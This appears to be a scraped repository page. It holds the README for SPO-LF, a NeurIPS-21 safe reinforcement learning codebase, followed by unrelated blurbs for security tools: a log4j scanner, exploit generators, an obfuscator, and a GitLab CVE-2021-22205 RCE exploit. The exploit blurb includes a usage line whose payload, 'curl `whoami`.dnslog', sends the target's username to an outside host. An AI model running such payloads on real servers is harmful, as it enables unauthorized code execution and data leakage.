Safe Policy Optimization with Local Features

Overview

Safe Policy Optimization with Local Feature (SPO-LF)

This is the source-code for implementing the algorithms in the paper "Safe Policy Optimization with Local Generalized Linear Function Approximations" which was presented in NeurIPS-21.

Installation

There is requirements.txt in this repository. Except for the common modules (e.g., numpy, scipy), our source code depends on the following modules.

We also provide Dockerfile in this repository, which can be used for reproducing our grid-world experiment.

Simulation configuration

We manage the simulation configuration using hydra. Configurations are listed in config.yaml. For example, the algorithm to run should be chosen from the ones we implemented:

sim_type: {safe_glm, unsafe_glm, random, oracle, safe_gp_state, safe_gp_feature, safe_glm_stepwise}

Grid World Experiment

The source code necessary for our grid-world experiment is contained in /grid_world folder. To run the simulation, for example, use the following commands.

cd grid_world
python main.py sim_type=safe_glm env.reuse_env=False

For the monte carlo simulation while comparing our proposed method with baselines, use the shell file, run.sh.

We also provide a script for visualization. If you want to render how the agent behaves, use the following command.

python main.py sim_type=safe_glm env.reuse_env=True

Safety-Gym Experiment

The source code necessary for our safety-gym experiment is contained in /safety_gym_discrete folder. Our experiment is based on safety-gym. Our proposed method utilize dynamic programming algorithms to solve Bellman Equation, so we modified engine.py to discrtize the environment. We attach modified safety-gym source code in /safety_gym_discrete/engine.py. To use the modified library, please clone safety-gym, then replace safety-gym/safety_gym/envs/engine.py using /safety_gym_discrete/engine.py in our repo. Using the following commands to install the modified library:

cd safety_gym
pip install -e .

Note that MuJoCo licence is needed for installing Safety-Gym. To run the simulation, use the folowing commands.

cd safety_gym_discrete
python main.py sim_idx=0

We compare our proposed method with three notable baselines: CPO, PPO-Lagrangian, and TRPO-Lagrangian. The baseline implementation depends on safety-starter-agents. We modified run_agent.py in the repo source code.

To run the baseline, use the folowing commands.

cd safety_gym_discrete/baseline
python baseline_run.py sim_type=cpo

The environment that agent runs on is generated using generate_env.py. We provide 10 50*50 environments. If you want to generate other environments, you can change the world shape in safety_gym_discrete.py, and running the following commands:

cd safety_gym_discrete
python generate_env.py

Citation

If you find this code useful in your research, please consider citing:

@inproceedings{wachi_yue_sui_neurips2021,
  Author = {Wachi, Akifumi and Wei, Yunyue and Sui, Yanan},
  Title = {Safe Policy Optimization with Local Generalized Linear Function Approximations},
  Booktitle  = {Neural Information Processing Systems (NeurIPS)},
  Year = {2021}
}
Owner
Akifumi Wachi
Akifumi Wachi
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

Podalirius 396 Jan 08, 2023
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

DW Dariel 5 Dec 03, 2022
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
PwdGen is a Python Tkinter tool for generating secure 16 digit passwords.

PwdGen ( Password Generator ) is a Python Tkinter tool for generating secure 16 digit passwords. Installation Simply install requirements pip install

zJairO 7 Jul 14, 2022
log4j burp scanner

log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

1 Jun 30, 2022
An Advanced Local Network IP Scanner, made in python of course!

██╗██████╗    ██████╗ █████╗ █████╗ ███╗ ██╗███╗ ██╗███████╗██████╗ ██║██╔══██╗  ██╔════╝██╔══██╗██╔══██╗████╗ ██║████╗ ██║██╔════╝██╔══██

Polsulpicien 2 Dec 18, 2021
BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3.

BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3. On first release it was able to successfully break many of the most well-known buffer overflow exampl

Kaan Caglan 5 Nov 23, 2021
EMBArk - The firmware security scanning environment

Embark is being developed to provide the firmware security analyzer emba as a containerized service and to ease accessibility to emba regardless of system and operating system.

emba 175 Dec 14, 2022
The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

Billy 114 Dec 26, 2022
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
Python implementation of the diceware password generating algorithm.

Diceware Password Generator - Generate High Entropy Passwords Please Note - This Program Do Not Store Passwords In Any Form And All The Passwords Are

Sameera Madushan 35 Dec 25, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
Course: Information Security with Python

Curso: Segurança da Informação com Python Curso realizado atravès da Plataforma da Digital Innovation One Prof: Bruno Dias Conteúdo: Introdução aos co

Elizeu Barbosa Abreu 1 Nov 28, 2021
Kunyu, more efficient corporate asset collection

Kunyu(坤舆) - More efficient corporate asset collection English | 中文文档 0x00 Introduce Tool introduction Kunyu (kunyu), whose name is taken from , is act

Knownsec, Inc. 772 Jan 05, 2023
logmap: Log4j2 jndi injection fuzz tool

logmap - Log4j2 jndi injection fuzz tool Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path Use http

之乎者也 67 Oct 25, 2022
This repo explains in details about buffer overflow exploit development for windows executable.

Buffer Overflow Exploit Development For Beginner Introduction I am beginner in security community and as my fellow beginner, I spend some of my time a

cris_0xC0 11 Dec 17, 2022
This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature

rpckiller This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature and with that you can further try to escalate

Ashish Kunwar 33 Sep 23, 2022
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
The self-hostable proxy tunnel

TTUN Server The self-hostable proxy tunnel. Running Running: docker run -e TUNNEL_DOMAIN=Your tunnel domain -e SECURE=True if using SSL ghcr.io/to

Tom van der Lee 2 Jan 11, 2022